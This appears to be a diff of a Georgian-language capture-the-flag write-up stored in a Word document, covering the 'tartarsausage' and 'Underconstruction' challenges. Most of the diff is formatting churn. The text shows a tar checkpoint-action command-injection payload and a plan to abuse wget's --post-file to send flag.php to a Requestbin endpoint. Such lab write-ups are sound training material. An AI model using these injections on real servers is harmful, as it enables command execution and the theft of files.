--- a/Antigone.docx
+++ b/Antigone.docx
@@ -14,8 +14,17 @@
           <w:sz w:val="40"/>
           <w:szCs w:val="40"/>
         </w:rPr>
-        <w:t>1. tartarsausage</w:t>
-      </w:r>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>tartarsausage</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -431,17 +440,8 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:t>ნების მიერი ბრძანების შეყვანისას გამოდის ასეთი ტექსტი რაც მიგვანიშნებს რომ უფრო უნდა ვეცადოთ . კაარგი. ახლა ვცადოთ შევიყვანოთ ასეთი payload და  cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec="ls"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="ka-GE"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t>ნების მიერი ბრძანების შეყვანისას გამოდის ასეთი ტექსტი რაც მიგვანიშნებს რომ უფრო უნდა ვეცადოთ . კაარგი. ახლა ვცადოთ შევიყვანოთ ასეთი payload   cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec="ls"</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -458,7 +458,124 @@
           <w:lang w:val="ka-GE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>რაც გამოგვიტანს ასეთ ფოლდერს რომლის მასალის წამოღება შეგვიძლია cat ბრძანებით</w:t>
+        <w:t>ფეილოუდის გაშვების შემდეგ მივიღეთ შემდეგი ჩამონათვალი მაგრამ ამ ჩამონათვალში ჩვენთვის ყველაზ ემნიშვნელოვანი enhjenhzZGN3YWRzYWRhc2Rhc3NhY2FzY2FzY2FzY2FjYWNzZHNhY2FzY2Fzc2FjY2Fz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>როგორც ჩანს ფლეგი ზუსტად მანდ იმალება</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D393ECA" wp14:editId="482AC1EB">
+            <wp:extent cx="4982270" cy="619211"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
+            <wp:docPr id="1365566113" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1365566113" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4982270" cy="619211"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">გავხსნათ ფლექი </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>ბრძანებით.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:val="ka-GE"/>
+        </w:rPr>
+        <w:t>და როგორც მოსალოდნელი იყო მივიღეთ ფლეგი</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -492,7 +609,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -544,7 +661,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -622,6 +739,7 @@
         </w:rPr>
         <w:t>2.</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="40"/>
@@ -629,6 +747,7 @@
         </w:rPr>
         <w:t>Underconstruction</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -667,7 +786,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -717,6 +836,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68EAE525" wp14:editId="0B9E44FC">
             <wp:extent cx="5943600" cy="1284605"/>
@@ -733,7 +853,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -827,7 +947,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB78C59" wp14:editId="0D826E61">
             <wp:extent cx="5943600" cy="953770"/>
@@ -844,7 +963,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -914,6 +1033,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D32502F" wp14:editId="7441F706">
             <wp:extent cx="5943600" cy="4081780"/>
@@ -930,7 +1050,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1008,7 +1128,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A10A43D" wp14:editId="481DA852">
             <wp:extent cx="5943600" cy="1706880"/>
@@ -1025,7 +1144,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1118,6 +1237,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D956943" wp14:editId="47F419D0">
             <wp:extent cx="5010849" cy="1076475"/>
@@ -1134,7 +1254,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1203,7 +1323,6 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="ka-GE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7B61B2" wp14:editId="5FA94C0F">
             <wp:extent cx="5943600" cy="4703445"/>
@@ -1220,7 +1339,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1353,7 +1472,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1455,7 +1574,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1507,7 +1626,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1624,7 +1743,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1676,12 +1795,21 @@
         </w:rPr>
         <w:t xml:space="preserve">ველი, აქ შეგვიძლია </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Requestbin </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Requestbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1721,7 +1849,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1772,7 +1900,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId25"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1822,7 +1950,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId26"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1850,13 +1978,15 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>საიტზე მივიღეთ ეს შედეგი და ვხედავთ რომ საიტი ხმარობს wget-ს ფაილების</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>საიტზე</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -1864,13 +1994,15 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>ჩამოსატვირთად, რომლის ერთერთი პარამეტრი არის --post-file რომელიც</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>მივიღეთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -1878,21 +2010,288 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">სერვერიდან ატვირთავს </w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ეს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>შედეგი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>და</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ვხედავთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რომ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>საიტი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ხმარობს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-ს </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ფაილების</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ჩამოსატვირთად</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რომლის</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ერთერთი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>პარამეტრი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>არის</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --post-file </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>რომელიც</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>სერვერიდან</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ატვირთავს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>სამიზნე სერვერზე ფაილს. შეგვიძლია ჩვენს საწყის</w:t>
-      </w:r>
+        <w:t>სამიზნე</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -1900,13 +2299,207 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>მოთხოვნას გავაყოლოთ ეს დამატებითი პარამეტრი და მოვითხოვოთ flag.php</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>სერვერზე</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ფაილს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>შეგვიძლია</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ჩვენს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>საწყის</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>მოთხოვნას</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>გავაყოლოთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ეს</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>დამატებითი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>პარამეტრი</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>და</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>მოვითხოვოთ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>flag.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1924,12 +2517,21 @@
         </w:rPr>
         <w:t xml:space="preserve">ეს </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">flag.php </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>flag.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1971,7 +2573,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
+                    <a:blip r:embed="rId27"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
